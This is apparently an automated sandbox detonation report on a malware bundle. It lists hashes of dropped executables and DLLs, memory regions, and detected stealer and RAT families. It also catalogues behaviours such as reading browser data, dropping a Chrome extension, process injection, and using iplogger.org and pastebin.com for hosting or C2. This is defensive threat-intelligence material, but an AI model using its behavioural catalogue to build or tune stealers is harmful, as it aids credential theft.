| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
C:\Users\Admin\AppData\Local\Temp\is-2USU1.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE
| MD5 | d165e339ef0c057e20eb61347d06d396 |
| SHA1 | cb508e60292616b22f2d7a5ab8f763e4c89cf448 |
| SHA256 | ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8 |
| SHA512 | da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580 |
memory/1520-181-0x0000000002730000-0x000000000288D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-2USU1.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/2528-153-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1260-150-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/676-148-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2260-136-0x0000000000F80000-0x0000000000F96000-memory.dmp
memory/1424-131-0x0000000000A30000-0x0000000000AA0000-memory.dmp
memory/2528-128-0x0000000000400000-0x0000000000414000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe
| MD5 | e90750ecf7d4add59391926ccfc15f51 |
| SHA1 | 6087df6ab46fe798b6eeab860d01c19ef5dbd3d1 |
| SHA256 | b840ae32fb4ca7d1ad9679aa51dff5970f4613cdb241ba73dabb5c55f38a5a59 |
| SHA512 | 8c5b9efc562475932a3a77abfb07603928eaf1c34a5eb46f3984703b129cece013ee5bd0257061afc3d69564a1bd5fd624528cbfe9eb608bde7636c948ed73b9 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0944361c3621a67a6.exe
| MD5 | bdbbf4f034c9f43e4ab00002eb78b990 |
| SHA1 | 99c655c40434d634691ea1d189b5883f34890179 |
| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
memory/1520-182-0x0000000002B50000-0x0000000002BF6000-memory.dmp
memory/1520-186-0x0000000002C00000-0x0000000002C93000-memory.dmp
memory/1520-184-0x0000000002C00000-0x0000000002C93000-memory.dmp
memory/1520-183-0x0000000002C00000-0x0000000002C93000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe
| MD5 | 363f9dd72b0edd7f0188224fb3aee0e2 |
| SHA1 | 2ee4327240df78e318937bc967799fb3b846602e |
| SHA256 | e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167 |
| SHA512 | 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece |
memory/1660-196-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1660-195-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1660-194-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1660-193-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1528-207-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1268-220-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-219-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1268-218-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1268-217-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1268-215-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1268-213-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1268-211-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1268-222-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-206-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-205-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/1528-203-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-201-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-199-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1528-197-0x0000000000400000-0x0000000000422000-memory.dmp
memory/1660-191-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/1660-187-0x0000000000400000-0x000000000051C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe
| MD5 | 3bf8a169c55f8b54700880baee9099d7 |
| SHA1 | d411f875744aa2cfba6d239bad723cbff4cf771a |
| SHA256 | 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2 |
| SHA512 | f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11 |
C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe
| MD5 | 69c4678681165376014646030a4fe7e4 |
| SHA1 | fb110dad415ac036c828b51c38debd34045aa0f3 |
| SHA256 | 90b33beb786f0c1274a79cda8d18e43b5ed5f2cad0b1e0de7b3b42370d2ffa77 |
| SHA512 | 81dcc6b46e99ef8242c0f2a0bc9f35c60f4111f7b083ffdd8c3d7195292deb5eda035c010d946cfdd9e212f7ea320f67b354c1c40b53808b996de3cd69feca1c |
memory/2860-235-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2860-233-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2860-232-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2860-231-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2860-229-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2860-227-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2860-225-0x0000000000400000-0x0000000000422000-memory.dmp
memory/676-237-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1660-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1660-74-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1660-73-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1660-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1660-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1660-68-0x0000000064940000-0x0000000064959000-memory.dmp
memory/1660-67-0x000000006494A000-0x000000006494F000-memory.dmp
memory/1660-66-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1660-65-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1660-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1660-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/1660-52-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zSC2959AD6\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5092 set thread context of 1420 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe |
| PID 2168 set thread context of 4584 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe |
| PID 2336 set thread context of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
